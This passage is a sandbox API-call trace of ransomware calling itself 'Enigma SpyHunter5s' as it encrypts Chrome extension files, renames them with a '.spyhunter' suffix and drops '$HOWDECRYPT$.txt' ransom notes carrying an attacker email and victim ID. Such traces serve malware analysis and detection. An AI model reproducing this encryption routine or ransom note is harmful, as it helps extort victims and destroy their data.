dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.243] WriteFile (in: hFile=0xb0, lpBuffer=0x57ea8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea4c, lpOverlapped=0x0 | out: lpBuffer=0x57ea8c*, lpNumberOfBytesWritten=0x57ea4c*=0x4, lpOverlapped=0x0) returned 1 [0160.243] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea4c*=0x30, lpOverlapped=0x0) returned 1 [0160.243] CloseHandle (hObject=0xb0) returned 1 [0160.243] GetProcessHeap () returned 0x2c0000 [0160.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.243] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.spyhunter") returned 165 [0160.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0160.245] GetProcessHeap () returned 0x2c0000 [0160.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.245] GetProcessHeap () returned 0x2c0000 [0160.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.245] GetProcessHeap () returned 0x2c0000 [0160.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e948 | out: hHeap=0x2c0000) returned 1 [0160.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.246] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.246] WriteFile (in: hFile=0xb0, lpBuffer=0x57e9bf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eae8, lpOverlapped=0x0 | out: lpBuffer=0x57e9bf*, lpNumberOfBytesWritten=0x57eae8*=0x127, lpOverlapped=0x0) returned 1 [0160.247] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.247] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eae8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eae8*=0x2ac, lpOverlapped=0x0) returned 1 [0160.247] CloseHandle (hObject=0xb0) returned 1 [0160.247] GetProcessHeap () returned 0x2c0000 [0160.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e7c0 | out: hHeap=0x2c0000) returned 1 [0160.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea88 | out: pbBuffer=0x57ea88) returned 1 [0160.247] GetProcessHeap () returned 0x2c0000 [0160.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea80*=0x30) returned 1 [0160.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0160.248] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.248] GetProcessHeap () returned 0x2c0000 [0160.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.249] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ea44*=0xc5, lpOverlapped=0x0) returned 1 [0160.249] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.250] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x57ea44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ea44*=0xc5, lpOverlapped=0x0) returned 1 [0160.250] GetProcessHeap () returned 0x2c0000 [0160.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.250] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.250] WriteFile (in: hFile=0xb0, lpBuffer=0x57ea84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea44, lpOverlapped=0x0 | out: lpBuffer=0x57ea84*, lpNumberOfBytesWritten=0x57ea44*=0x4, lpOverlapped=0x0) returned 1 [0160.250] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea44*=0x30, lpOverlapped=0x0) returned 1 [0160.250] CloseHandle (hObject=0xb0) returned 1 [0160.250] GetProcessHeap () returned 0x2c0000 [0160.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.250] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.spyhunter") returned 165 [0160.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0160.252] GetProcessHeap () returned 0x2c0000 [0160.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.252] GetProcessHeap () returned 0x2c0000 [0160.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.252] GetProcessHeap () returned 0x2c0000 [0160.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e638 | out: hHeap=0x2c0000) returned 1 [0160.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.253] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.253] WriteFile (in: hFile=0xb0, lpBuffer=0x57e9b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eae0, lpOverlapped=0x0 | out: lpBuffer=0x57e9b7*, lpNumberOfBytesWritten=0x57eae0*=0x127, lpOverlapped=0x0) returned 1 [0160.254] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.254] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eae0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eae0*=0x2ac, lpOverlapped=0x0) returned 1 [0160.254] CloseHandle (hObject=0xb0) returned 1 [0160.254] GetProcessHeap () returned 0x2c0000 [0160.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e4b0 | out: hHeap=0x2c0000) returned 1 [0160.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea80 | out: pbBuffer=0x57ea80) returned 1 [0160.255] GetProcessHeap () returned 0x2c0000 [0160.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea78*=0x30) returned 1 [0160.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0160.256] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0160.256] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.412] GetProcessHeap () returned 0x2c0000 [0160.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.412] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ea3c*=0x14e, lpOverlapped=0x0) returned 1 [0160.413] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffeb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.413] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x14e, lpNumberOfBytesWritten=0x57ea3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ea3c*=0x14e, lpOverlapped=0x0) returned 1 [0160.413] GetProcessHeap () returned 0x2c0000 [0160.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.413] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.414] WriteFile (in: hFile=0xb0, lpBuffer=0x57ea7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea3c, lpOverlapped=0x0 | out: lpBuffer=0x57ea7c*, lpNumberOfBytesWritten=0x57ea3c*=0x4, lpOverlapped=0x0) returned 1 [0160.414] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea3c*=0x30, lpOverlapped=0x0) returned 1 [0160.414] CloseHandle (hObject=0xb0) returned 1 [0160.414] GetProcessHeap () returned 0x2c0000 [0160.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.414] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.spyhunter") returned 165 [0160.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.spyhunter")) returned 1 [0160.415] GetProcessHeap () returned 0x2c0000 [0160.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.415] GetProcessHeap () returned 0x2c0000 [0160.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.415] GetProcessHeap () returned 0x2c0000 [0160.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e328 | out: hHeap=0x2c0000) returned 1 [0160.416] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea78 | out: pbBuffer=0x57ea78) returned 1 [0160.416] GetProcessHeap () returned 0x2c0000 [0160.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.416] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea70*=0x30) returned 1 [0160.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.416] GetProcessHeap () returned 0x2c0000 [0160.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.416] GetProcessHeap () returned 0x2c0000 [0160.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b2a8 | out: hHeap=0x2c0000) returned 1 [0160.416] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea78 | out: pbBuffer=0x57ea78) returned 1 [0160.416] GetProcessHeap () returned 0x2c0000 [0160.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.416] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea70*=0x30) returned 1 [0160.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.417] GetProcessHeap () returned 0x2c0000 [0160.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.417] GetProcessHeap () returned 0x2c0000 [0160.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b1b8 | out: hHeap=0x2c0000) returned 1 [0160.417] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea70 | out: pbBuffer=0x57ea70) returned 1 [0160.417] GetProcessHeap () returned 0x2c0000 [0160.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.417] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea68*=0x30) returned 1 [0160.417] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.417] GetProcessHeap () returned 0x2c0000 [0160.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.417] GetProcessHeap () returned 0x2c0000 [0160.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b0c8 | out: hHeap=0x2c0000) returned 1 [0160.417] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea70 | out: pbBuffer=0x57ea70) returned 1 [0160.417] GetProcessHeap () returned 0x2c0000 [0160.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.417] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea68*=0x30) returned 1 [0160.418] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.418] GetProcessHeap () returned 0x2c0000 [0160.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.418] GetProcessHeap () returned 0x2c0000 [0160.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8afd8 | out: hHeap=0x2c0000) returned 1 [0160.418] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea68 | out: pbBuffer=0x57ea68) returned 1 [0160.418] GetProcessHeap () returned 0x2c0000 [0160.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.418] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea60*=0x30) returned 1 [0160.418] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.418] GetProcessHeap () returned 0x2c0000 [0160.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.418] GetProcessHeap () returned 0x2c0000 [0160.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8aee8 | out: hHeap=0x2c0000) returned 1 [0160.418] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea68 | out: pbBuffer=0x57ea68) returned 1 [0160.418] GetProcessHeap () returned 0x2c0000 [0160.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea60*=0x30) returned 1 [0160.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.419] GetProcessHeap () returned 0x2c0000 [0160.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.419] GetProcessHeap () returned 0x2c0000 [0160.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a3a8 | out: hHeap=0x2c0000) returned 1 [0160.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea60 | out: pbBuffer=0x57ea60) returned 1 [0160.419] GetProcessHeap () returned 0x2c0000 [0160.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea58*=0x30) returned 1 [0160.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.419] 